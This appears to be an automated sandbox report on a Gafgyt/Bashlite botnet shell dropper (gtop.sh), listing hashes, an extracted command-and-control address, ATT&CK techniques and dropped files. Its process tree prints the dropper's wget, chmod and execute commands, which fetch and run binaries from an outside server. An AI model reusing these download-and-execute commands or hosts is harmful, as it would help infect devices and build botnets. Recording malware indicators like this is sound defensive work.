gafgyt | 7080f56e8be79f89d154730ffb07e9d9f22bb754c6ee295548593245bc21a1af

Analysis

max time kernel
15s
max time network
40s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
25-12-2024 15:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

gtop.sh
Size

2KB
MD5

297b82d777e2257fda8221703403b2d3
SHA1

d1ebd4f576bf89adcdf9453879c3ae2adeeb42ed
SHA256

7080f56e8be79f89d154730ffb07e9d9f22bb754c6ee295548593245bc21a1af
SHA512

dc0fc05650eca6bde3d5b02568e68810c61e1b6b58f5bb31f4847ef4082cd63f7aae45db042ec4e7f659615e761dcd472c6b8e20abd6e8431a3bd0c0f2ecea81

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

154.213.186.115:4444

Signatures

Detected Gafgyt variant 9 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt
behavioral2/files/fstream-6.dat	family_gafgyt
behavioral2/files/fstream-7.dat	family_gafgyt
behavioral2/files/fstream-8.dat	family_gafgyt
behavioral2/files/fstream-9.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 9 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
712	chmod
733	chmod
757	chmod
701	chmod
707	chmod
724	chmod
742	chmod
692	chmod
717	chmod

Executes dropped EXE 9 IoCs

ioc	pid	Process
/tmp/jackmymips	694	jackmymips
/tmp/jackmymips64	703	jackmymips64
/tmp/jackmymipsel	708	jackmymipsel
/tmp/jackmysh4	713	jackmysh4
/tmp/jackmyx86	718	jackmyx86
/tmp/jackmyi486	725	jackmyi486
/tmp/jackmyi586	734	jackmyi586
/tmp/jackmyi686	743	jackmyi686
/tmp/jackmypowerpc	759	jackmypowerpc

System Network Configuration Discovery 1 TTPs 9 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
694	jackmymips
710	rm
705	rm
706	wget
708	jackmymipsel
671	wget
698	rm
699	wget
703	jackmymips64

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jackmysh4	wget
File opened for modification	/tmp/jackmyx86	wget
File opened for modification	/tmp/jackmyi586	wget
File opened for modification	/tmp/jackmymips64	wget
File opened for modification	/tmp/jackmymipsel	wget
File opened for modification	/tmp/jackmyi686	wget
File opened for modification	/tmp/jackmypowerpc	wget
File opened for modification	/tmp/jackmymips	wget
File opened for modification	/tmp/jackmyi486	wget

/tmp/gtop.sh
/tmp/gtop.sh
1⤵
PID:666
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmymips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:671
- /bin/chmod
  chmod +x jackmymips
  2⤵
  - File and Directory Permissions Modification
  PID:692
- /tmp/jackmymips
  ./jackmymips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:694
- /bin/rm
  rm -rf jackmymips
  2⤵
  - System Network Configuration Discovery
  PID:698
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmymips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:699
- /bin/chmod
  chmod +x jackmymips64
  2⤵
  - File and Directory Permissions Modification
  PID:701
- /tmp/jackmymips64
  ./jackmymips64
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:703
- /bin/rm
  rm -rf jackmymips64
  2⤵
  - System Network Configuration Discovery
  PID:705
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmymipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:706
- /bin/chmod
  chmod +x jackmymipsel
  2⤵
  - File and Directory Permissions Modification
  PID:707
- /tmp/jackmymipsel
  ./jackmymipsel
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:708
- /bin/rm
  rm -rf jackmymipsel
  2⤵
  - System Network Configuration Discovery
  PID:710
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmysh4
  2⤵
  - Writes file to tmp directory
  PID:711
- /bin/chmod
  chmod +x jackmysh4
  2⤵
  - File and Directory Permissions Modification
  PID:712
- /tmp/jackmysh4
  ./jackmysh4
  2⤵
  - Executes dropped EXE
  PID:713
- /bin/rm
  rm -rf jackmysh4
  2⤵
  PID:715
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmyx86
  2⤵
  - Writes file to tmp directory
  PID:716
- /bin/chmod
  chmod +x jackmyx86
  2⤵
  - File and Directory Permissions Modification
  PID:717
- /tmp/jackmyx86
  ./jackmyx86
  2⤵
  - Executes dropped EXE
  PID:718
- /bin/rm
  rm -rf jackmyx86
  2⤵
  PID:720
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmyi486
  2⤵
  - Writes file to tmp directory
  PID:721
- /bin/chmod
  chmod +x jackmyi486
  2⤵
  - File and Directory Permissions Modification
  PID:724
- /tmp/jackmyi486
  ./jackmyi486
  2⤵
  - Executes dropped EXE
  PID:725
- /bin/rm
  rm -rf jackmyi486
  2⤵
  PID:728
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmyi586
  2⤵
  - Writes file to tmp directory
  PID:729
- /bin/chmod
  chmod +x jackmyi586
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/jackmyi586
  ./jackmyi586
  2⤵
  - Executes dropped EXE
  PID:734
- /bin/rm
  rm -rf jackmyi586
  2⤵
  PID:736
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmyi686
  2⤵
  - Writes file to tmp directory
  PID:738
- /bin/chmod
  chmod +x jackmyi686
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/jackmyi686
  ./jackmyi686
  2⤵
  - Executes dropped EXE
  PID:743
- /bin/rm
  rm -rf jackmyi686
  2⤵
  PID:745
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmypowerpc
  2⤵
  - Writes file to tmp directory
  PID:747
- /bin/chmod
  chmod +x jackmypowerpc
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/jackmypowerpc
  ./jackmypowerpc
  2⤵
  - Executes dropped EXE
  PID:759
- /bin/rm
  rm -rf jackmypowerpc
  2⤵
  PID:761
- /usr/bin/wget
  wget http://141.95.84.4:1594/jackmym86k
  2⤵
  PID:763

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jackmyi486

Filesize
126KB

MD5
37bc4b1d4fce9500ee4fee154e61d9e6

SHA1
6fddc8858547e60672cca66857ceb7293638a057

SHA256
72071458112606424f8eb5e064a29f4ab4016d3971da7f89e62785abeb9cbb9c

SHA512
3db6d2ed8a079792d9fc024a9e98a7cf6959ca446c4944726707c48a93775c5b40b2b9d46150a287561a4fdc6a1aa21310d8271ac521b40a733d15f07623d8eb

Download Submit
/tmp/jackmyi586

Filesize
135KB

MD5
4ca387e1408f29f6ed1979acfb671f82

SHA1
3467879b5fd631a5884f947ba013d61ea8a33c91

SHA256
1f7ba28d9d2ea091a89b2f7e4131b76163a6dcfb696cc34b073de8c9bf8afc4d

SHA512
18995f38839a98d0d478dad4b4b000e478effd1acaea865a5e947454e1d17d296ae519556f1a30f875b505f38f298440d20ff988440457907d5dd3ae9492c738

Download Submit
/tmp/jackmyi686

Filesize
139KB

MD5
1aeb2935aec67978bfdab8243470b577

SHA1
b26b260d86609e9c758279c59eb8caec53fd0f69

SHA256
936937cb11ad426210af65f850f4afee5713e324ad703a12d0b5f687ea84cf57

SHA512
3843063e037212bc1a60b67a69407cb466ee67d6d9935018f7fcebe5536c4be078cc797865cdfafd2f9073cec8c6425546089aee641d3788b61f4238a15748ce

Download Submit
/tmp/jackmymips

Filesize
199KB

MD5
f2ab2725ea6c883a5c608bc365c41fe5

SHA1
454d6983d9a7bb59aa0441b2c2cc805a97738e66

SHA256
531e818ee346f15e78c4f08d8de52a64597e10ce744b1be9dd2137eb1cd78c1d

SHA512
572183decc9a9ee8878e77485db9a22b6b0606e667743788eb5f5b1f8f35522505c216fe027931fa8913989053fa346b46b78c6b2209ecd53630bbc14e1d3a26

Download Submit
/tmp/jackmymips64

Filesize
244KB

MD5
89655c0a64c3552ee71dc901a3561ad1

SHA1
8a488927882c18b5a35da06c6428f8707d4314ad

SHA256
08d4aed11bff7d311aa206396b2651f2e587e0fbe41d2688281ad4e0f6322d04

SHA512
23c581fe1ca57cc3dc9a7efeeee4d97eb5f97ac92ed3cf1f4af4e8d2caa467aa6e826a29f01a67b9dcc8609e77e76e9d23ee985f770fada89a9acab484c9af6f

Download Submit
/tmp/jackmymipsel

Filesize
199KB

MD5
caabd697c443462f0a04d6b30529df58

SHA1
4fcb97074d1971ebfa482aad5edf208b43b6d819

SHA256
5259f289b8841e6beb9718c486210857edac40b5c206e5949fa5402b861849cf

SHA512
abf9607d8d332eca40f19ffef0866414fa353f12663c3dd232dd190954ab4f401f69cc9e84f669910c801a30df62bba8f00425aac5b1bfd99e756bdd4277a1a8

Download Submit
/tmp/jackmypowerpc

Filesize
150KB

MD5
29f174a35d868d69945c412c159184dd

SHA1
7ac1d35bdbe15fed8443341de0875579ec8099d0

SHA256
b9966986b49c8db77d7909f17e743e4e7f6df00379a990467d62db55c69a3b7b

SHA512
6047582863aca61d2e8925f2fa6e4cc4eecdcd4095b76ea276e9489f7da1fc54503a01370f4f2f4553d144818cfa6b8324fdf772d92ecdcca57465904f012899

Download Submit
/tmp/jackmysh4

Filesize
146KB

MD5
2a8e0da501cea8f8d32893a5fd6c9aab

SHA1
29b2be373b4155632926b9656861bebd53264473

SHA256
17f492bbf1085e3cec77c8b46831a7d2ef4662d0162377358e17296bebbb08d1

SHA512
64764a34cd7e8b7be0220519910b6f5a7e3c47340e45450e4e368515dca6c73ab3bbe11726f380533e11bc4ec840838d73a5dcc4720c93c96bb2b1444eedf6c7

Download Submit
/tmp/jackmyx86

Filesize
156KB

MD5
afcb3a143b9f4e3a985c3eeb2e2ae4c8

SHA1
295f0e0380f71feb1c8911e29882db6a792bbd58

SHA256
fd0b10b636f99ee5e527b266d917c41d33230ad6bf600454e10b3e106db1031c

SHA512
b6124a40e8a5e7ff49df9b11e3b5097ac9e81b76c6146d902600f50de431e535136d22d63a34736b3fc53121ad0fa2d6b00af18b1ce834997c94c8eb288f5b08

Download Submit